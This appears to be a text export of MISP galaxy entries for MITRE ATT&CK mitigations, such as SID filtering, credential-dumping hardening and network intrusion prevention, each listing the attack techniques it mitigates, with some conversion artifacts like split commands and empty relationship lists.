LLMNR/NBT-NS Poisoning Mitigation - T1171 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and Relay - T1171" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://adsecurity.org/?p=3299">https://adsecurity.org/?p=3299</a></td>
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Restrict Web-Based Content - M1021

Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.

The tag is: misp-galaxy:mitre-course-of-action="Restrict Web-Based Content - M1021"

Restrict Web-Based Content - M1021 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1223" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1192" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with
estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 3982. Table References

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<td><a href="https://attack.mitre.org/mitigations/M1021">https://attack.mitre.org/mitigations/M1021</a></td>
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</table>

**Multi-Stage Channels Mitigation - T1104**

Command and control infrastructure used in a multi-stage channel may be blocked if known ahead of time. If unique signatures are present in the C2 traffic, they could also be used as the basis of identifying and blocking the channel. (Citation: University of Birmingham C2)

The tag is: `misp-galaxy:mitre-course-of-action="Multi-Stage Channels Mitigation - T1104"`

Multi-Stage Channels Mitigation - T1104 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"

Table 3983. Table References

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Third-party Software Mitigation - T1072

Evaluate the security of third-party software that could be used in the enterprise environment. Ensure that access to management systems for third-party systems is limited, monitored, and secure. Have a strict approval policy for use of third-party systems.

Grant access to third-party systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multi-factor authentication. Verify that account credentials that may be used to access third-party systems are unique and not used throughout the enterprise network. Ensure that any accounts used by third-party providers to access these systems are traceable to the third-party and are not used throughout the network or used by other third-party providers in the same environment. Ensure third-party systems are regularly patched by users or the provider to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).

Ensure there are regular reviews of accounts provisioned to these systems to verify continued business need, and ensure there is governance to trace de-provisioning of access that is no longer required.

Where the third-party system is used for deployment services, ensure that it can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the third-party system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.

The tag is: `misp-galaxy:mitre-course-of-action="Third-party Software Mitigation - T1072"`

Third-party Software Mitigation - T1072 has relationships with:


Table 3984. Table References

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DLL Side-Loading Mitigation - T1073

Update software regularly. Install software in write-protected locations. Use the program `sxstrace.exe` that is included with Windows along with manual inspection to check manifest files for side-loading vulnerabilities in software.

The tag is: `misp-galaxy:mitre-course-of-action="DLL Side-Loading Mitigation - T1073"`
DLL Side-Loading Mitigation - T1073 has relationships with:


Re-opened Applications Mitigation - T1164

Holding the Shift key while logging in prevents apps from opening automatically (Citation: Re-Open windows on Mac). This feature can be disabled entirely with the following terminal command: 
<code>defaults write -g ApplePersistence -bool no</code>.

The tag is: misp-galaxy:mitre-course-of-action="Re-opened Applications Mitigation - T1164"

Re-opened Applications Mitigation - T1164 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1164" with estimative-language:likelihood-probability="almost-certain"

SID-History Injection Mitigation - T1178

Clean up SID-History attributes after legitimate account migration is complete.

Consider applying SID Filtering to interforest trusts, such as forest trusts and external trusts, to exclude SID-History from requests to access domain resources. SID Filtering ensures that any authentication requests over a trust only contain SIDs of security principals from the trusted domain (i.e. preventing the trusted domain from claiming a user has membership in groups outside of the domain).

SID Filtering of forest trusts is enabled by default, but may have been disabled in some cases to allow a child domain to transitively access forest trusts. SID Filtering of external trusts is automatically enabled on all created external trusts using Server 2003 or later domain controllers. (Citation: Microsoft Trust Considerations Nov 2014) (Citation: Microsoft SID Filtering Quarantining Jan 2009) However note that SID Filtering is not automatically applied to legacy trusts or may have been deliberately disabled to allow inter-domain access to resources.

SID Filtering can be applied by: (Citation: Microsoft Netdom Trust Sept 2012)

- Disabling SIDHistory on forest trusts using the netdom tool 
<code>netdom trust ...</code>
<TrustingDomainName> /domain:<TrustedDomainName> /EnableSIDHistory:no</code> on the domain controller).

- Applying SID Filter Quarantining to external trusts using the netdom tool (<code>netdom trust <TrustingDomainName> /domain:<TrustedDomainName> /quarantine:yes</code> on the domain controller) Applying SID Filtering to domain trusts within a single forest is not recommended as it is an unsupported configuration and can cause breaking changes. (Citation: Microsoft Netdom Trust Sept 2012) (Citation: AdSecurity Kerberos GT Aug 2015) If a domain within a forest is untrustworthy then it should not be a member of the forest. In this situation it is necessary to first split the trusted and untrusted domains into separate forests where SID Filtering can be applied to an interforest trust.

The tag is: misp-galaxy:mitre-course-of-action="SID-History Injection Mitigation - T1178"

SID-History Injection Mitigation - T1178 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1178" with estimative-language:likelihood-probability="almost-certain"

Table 3987. Table References

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<td><a href="https://adsecurity.org/?p=1640">https://adsecurity.org/?p=1640</a></td>
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**Multi-hop Proxy Mitigation - T1188**

Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network black and white lists. It should be noted that this kind of blocking may be circumvented by other techniques like [Domain Fronting](https://attack.mitre.org/techniques/T1172).

The tag is: misp-galaxy:mitre-course-of-action="Multi-hop Proxy Mitigation - T1188"

Multi-hop Proxy Mitigation - T1188 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1188" with estimative-language:likelihood-probability="almost-certain"

Table 3988. Table References

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<td><a href="https://attack.mitre.org/mitigations/T1188">https://attack.mitre.org/mitigations/T1188</a></td>
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</table>
Drive-by Compromise Mitigation - T1189

Drive-by compromise relies on there being a vulnerable piece of software on the client end systems. Use modern browsers with security features turned on. Ensure all browsers and plugins kept updated can help prevent the exploit phase of this technique.

For malicious code served up through ads, adblockers can help prevent that code from executing in the first place. Script blocking extensions can help prevent the execution of JavaScript that may commonly be used during the exploitation process.

Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist. (Citation: Windows Blogs Microsoft Edge Sandbox) (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Other types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility.

The tag is: misp-galaxy:mitre-course-of-action="Drive-by Compromise Mitigation - T1189"

Drive-by Compromise Mitigation - T1189 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

Table 3989. Table References

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<td><a href="https://en.wikipedia.org/wiki/Control-flow_integrity">https://en.wikipedia.org/wiki/Control-flow_integrity</a></td>
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</table>

Data Obfuscation Mitigation - T1001

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are
often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: *misp-galaxy:mitre-course-of-action=*"Data Obfuscation Mitigation - T1001"*

Data Obfuscation Mitigation - T1001 has relationships with:

- mitigates: *misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001"* with estimative-language:likelihood-probability="almost-certain"

**Table 3990. Table References**

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**Web Shell Mitigation - T1100**

Ensure that externally facing Web servers are patched regularly to prevent adversary access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) to gain remote code access or through file inclusion weaknesses that may allow adversaries to upload files or scripts that are automatically served as Web pages.

Audit account and group permissions to ensure that accounts used to manage servers do not overlap with accounts and permissions of users in the internal network that could be acquired through Credential Access and used to log into the Web server and plant a Web shell or pivot from the Web server into the internal network. (Citation: US-CERT Alert TA15-314A Web Shells)

The tag is: *misp-galaxy:mitre-course-of-action="Web Shell Mitigation - T1100"*

Web Shell Mitigation - T1100 has relationships with:

- mitigates: *misp-galaxy:mitre-attack-pattern="Web Shell - T1100"* with estimative-language:likelihood-probability="almost-certain"

**Table 3991. Table References**

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</table>

**Automated Exfiltration Mitigation - T1020**

Identify unnecessary system utilities, scripts, or potentially malicious software that may be used to transfer data outside of a network, and audit and/or block them by using whitelisting (Citation:
Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: **misp-galaxy:mitre-course-of-action="Automated Exfiltration Mitigation - T1020"**

Automated Exfiltration Mitigation - T1020 has relationships with:


**Table 3992. Table References**

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<td><a href="http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599">http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599</a></td>
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<tr>
<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
</tr>
</tbody>
</table>

**Hardware Additions Mitigation - T1200**

Establish network access control policies, such as using device certificates and the 802.1x standard. (Citation: Wikipedia 802.1x) Restrict use of DHCP to registered devices to prevent unregistered devices from communicating with trusted systems.

Block unknown devices and accessories by endpoint security configuration and monitoring agent.

The tag is: **misp-galaxy:mitre-course-of-action="Hardware Additions Mitigation - T1200"**

Hardware Additions Mitigation - T1200 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200" with estimative-language:likelihood-probability="almost-certain"

**Table 3993. Table References**

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<td><a href="https://attack.mitre.org/mitigations/T1200">https://attack.mitre.org/mitigations/T1200</a></td>
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</table>

**Data Compressed Mitigation - T1002**

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may
be used to compress files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

If network intrusion prevention or data loss prevention tools are set to block specific file types from leaving the network over unencrypted channels, then an adversary may move to an encrypted channel.

The tag is: misp-galaxy:mitre-course-of-action="Data Compressed Mitigation - T1002"

Data Compressed Mitigation - T1002 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Data Compressed - T1002" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599">http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599</a></td>
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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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**Credential Dumping Mitigation - T1003**

**Windows**

Monitor/harden access to LSASS and SAM table with tools that allow process whitelisting. Limit credential overlap across systems to prevent lateral movement opportunities using [Valid Accounts](https://attack.mitre.org/techniques/T1078) if passwords and hashes are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)

On Windows 8.1 and Windows Server 2012 R2, enable Protected Process Light for LSA. (Citation: Microsoft LSA)

Identify and block potentially malicious software that may be used to dump credentials by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT)
With Windows 10, Microsoft implemented new protections called Credential Guard to protect the LSA secrets that can be used to obtain credentials through forms of credential dumping. It is not configured by default and has hardware and firmware system requirements. It also does not protect against all forms of credential dumping.

Manage the access control list for “Replicating Directory Changes” and other permissions associated with domain controller replication.

Consider disabling or restricting NTLM traffic.

**Linux**

Scraping the passwords from memory requires root privileges. Follow best practices in restricting access to escalated privileges to avoid hostile programs from accessing such sensitive regions of memory.

The tag is: `misp-galaxy:mitre-course-of-action="Credential Dumping Mitigation - T1003"`

Credential Dumping Mitigation - T1003 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003"` with estimative-language:likelihood-probability="almost-certain"

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<td>application-whitelisting-using-microsoft-applocker.cfm</td>
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<td><a href="https://github.com/iadgov/Secure-Host-Baseline/tree/master/Credential%20Guard">https://github.com/iadgov/Secure-Host-Baseline/tree/master/Credential%20Guard</a></td>
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<td><a href="https://adsecurity.org/?p=1729">https://adsecurity.org/?p=1729</a></td>
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System Partition Integrity - M1004

Ensure that Android devices being used include and enable the Verified Boot capability, which cryptographically ensures the integrity of the system partition.

The tag is: *misp-galaxy:mitre-course-of-action=*"System Partition Integrity - M1004"

System Partition Integrity - M1004 has relationships with:

- mitigates: *misp-galaxy:mitre-attack-pattern=*"Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"

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Network Sniffing Mitigation - T1040

Ensure that all wireless traffic is encrypted appropriately. Use Kerberos, SSL, and multifactor authentication wherever possible. Monitor switches and network for span port usage, ARP/DNS poisoning, and router reconfiguration.

Identify and block potentially malicious software that may be used to sniff or analyze network traffic by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: *misp-galaxy:mitre-course-of-action=*"Network Sniffing Mitigation - T1040"

Network Sniffing Mitigation - T1040 has relationships with:

- mitigates: *misp-galaxy:mitre-attack-pattern=*"Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

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New Service Mitigation - T1050

Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new services.

Identify and block unnecessary system utilities or potentially malicious software that may be used to create services by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="New Service Mitigation - T1050"

New Service Mitigation - T1050 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="New Service - T1050" with estimative-language:likelihood-probability="almost-certain"

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Fallback Channels Mitigation - T1008

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Fallback Channels Mitigation - T1008"

Fallback Channels Mitigation - T1008 has relationships with:
Binary Padding Mitigation - T1009

Identify potentially malicious software that may be executed from a padded or otherwise obfuscated binary, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Binary Padding Mitigation - T1009"

Binary Padding Mitigation - T1009 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Binary Padding - T1009" with estimative-language:likelihood-probability="almost-certain"

Encrypt Network Traffic - M1009

Application developers should encrypt all of their application network traffic using the Transport Layer Security (TLS) protocol to ensure protection of sensitive data and deter network-based attacks. If desired, application developers could perform message-based encryption of data before passing it for TLS encryption.

iOS’s App Transport Security feature can be used to help ensure that all application network traffic is appropriately protected. Apple intends to mandate use of App Transport Security (Citation: TechCrunch-ATS) for all apps in the Apple App Store unless appropriate justification is given.
Android’s Network Security Configuration feature similarly can be used by app developers to help ensure that all of their application network traffic is appropriately protected (Citation: Android-NetworkSecurityConfig).

Use of Virtual Private Network (VPN) tunnels, e.g. using the IPsec protocol, can help mitigate some types of network attacks as well.

The tag is: misp-galaxy:mitre-course-of-action="Encrypt Network Traffic - M1009"

Encrypt Network Traffic - M1009 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Rogue Wi-Fi Access Points - T1465" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Downgrade to Insecure Protocols - T1466" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Rogue Cellular Base Station - T1467" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Manipulate Device Communication - T1463" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Redirect Phone Calls/SMS - T1449" with estimative-language:likelihood-probability="almost-certain"

Table 4001. Table References

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<td><a href="https://attack.mitre.org/mitigations/M1009">https://attack.mitre.org/mitigations/M1009</a></td>
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<tr>
<td><a href="https://developer.android.com/training/articles/security-config.html">https://developer.android.com/training/articles/security-config.html</a></td>
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</table>

**Brute Force Mitigation - T1110**

Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Too strict a policy can create a denial of service condition and render environments un-usable, with all accounts being locked-out permanently. Use multifactor authentication. Follow best practices for mitigating access to [Valid Accounts](https://attack.mitre.org/techniques/T1078)

Refer to NIST guidelines when creating passwords.(Citation: NIST 800-63-3)

Where possible, also enable multi factor authentication on external facing services.
The tag is: `misp-galaxy:mitre-course-of-action="Brute Force Mitigation - T1110"`

Brute Force Mitigation - T1110 has relationships with:


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**Table 4002. Table References**

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**Query Registry Mitigation - T1012**

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information within the Registry, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: `misp-galaxy:mitre-course-of-action="Query Registry Mitigation - T1012"`

Query Registry Mitigation - T1012 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Query Registry - T1012"` with estimative-language:likelihood-probability="almost-certain"

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**Table 4003. Table References**

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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**Web Service Mitigation - T1102**

Firewalls and Web proxies can be used to enforce external network communication policy. It may be difficult for an organization to block particular services because so many of them are commonly used during the course of business.

Network intrusion detection and prevention systems that use network signatures to identify traffic
for specific adversary malware can be used to mitigate activity at the network level. Signatures are
often for unique indicators within protocols and may be based on the specific protocol or encoded
commands used by a particular adversary or tool, and will likely be different across various
malware families and versions. Adversaries will likely change tool C2 signatures over time or
construct protocols in such a way as to avoid detection by common defensive tools. (Citation:
University of Birmingham C2)

The tag is: `misp-galaxy:mitre-course-of-action="Web Service Mitigation - T1102"`

Web Service Mitigation - T1102 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Web Service - T1102"` with estimative-
  language:likelihood-probability="almost-certain"

Table 4004. Table References

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**Application Developer Guidance - M1013**

This mitigation describes any guidance or training given to developers of applications to avoid
introducing security weaknesses that an adversary may be able to take advantage of.

The tag is: `misp-galaxy:mitre-course-of-action="Application Developer Guidance - M1013"`

Application Developer Guidance - M1013 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078"` with estimative-
  language:likelihood-probability="almost-certain"

- mitigates: `misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002"` with estimative-
  language:likelihood-probability="almost-certain"

- mitigates: `misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574"` with estimative-
  language:likelihood-probability="almost-certain"

- mitigates: `misp-galaxy:mitre-attack-pattern="Access Sensitive Data in Device Logs - T1413"` with
  estimative-language:likelihood-probability="almost-certain"

- mitigates: `misp-galaxy:mitre-attack-pattern="Screen Capture - T1513"` with estimative-
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- mitigates: `misp-galaxy:mitre-attack-pattern="Access Notifications - T1517"` with estimative-
  language:likelihood-probability="almost-certain"

- mitigates: `misp-galaxy:mitre-attack-pattern="URI Hijacking - T1416"` with estimative-
  language:likelihood-probability="almost-certain"

Table 4005. Table References

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AppInit DLLs Mitigation - T1103

Upgrade to Windows 8 or later and enable secure boot.

Identify and block potentially malicious software that may be executed through AppInit DLLs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

The tag is: misp-galaxy:mitre-course-of-action="AppInit DLLs Mitigation - T1103"

AppInit DLLs Mitigation - T1103 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1103" with estimative-language:likelihood-probability="almost-certain"

Table 4006. Table References

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<tr>
<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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Network Intrusion Prevention - M1031

Use intrusion detection signatures to block traffic at network boundaries.

The tag is: misp-galaxy:mitre-course-of-action="Network Intrusion Prevention - M1031"

Network Intrusion Prevention - M1031 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Data Compressed - T1002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Redundant Access - T1108" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Non-Standard Encoding - T1132.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
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• mitigates: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Man-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="ARP Cache Poisoning - T1557.002" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Data from Configuration Repository - T1602" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="SNMP (MIB Dump) - T1602.001" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Network Device Configuration Dump - T1602.002" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="TFTP Boot - T1542.005" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="ROMMONkit - T1542.004" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Malicious Image - T1204.003" with estimative-language:likelihood-probability="almost-certain"
Port Monitors Mitigation - T1013

Identify and block potentially malicious software that may persist in this manner by using whitelisting (Citation: Beechey 2010) tools capable of monitoring DLL loads by processes running under SYSTEM permissions.

The tag is: misp-galaxy:mitre-course-of-action="Port Monitors Mitigation - T1013"

Port Monitors Mitigation - T1013 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Port Monitors - T1013" with estimative-language:likelihood-probability="almost-certain"

Encrypt Sensitive Information - M1041

Protect sensitive information with strong encryption.

The tag is: misp-galaxy:mitre-course-of-action="Encrypt Sensitive Information - M1041"

Encrypt Sensitive Information - M1041 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1492" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1493" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1208" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with
estimative-language:likelihood-probability="almost-certain"


- mitigates: misp-galaxy:mitre-attack-pattern="Data from Cloud Storage Object - T1530" with estimative-language:likelihood-probability="almost-certain"


- mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"

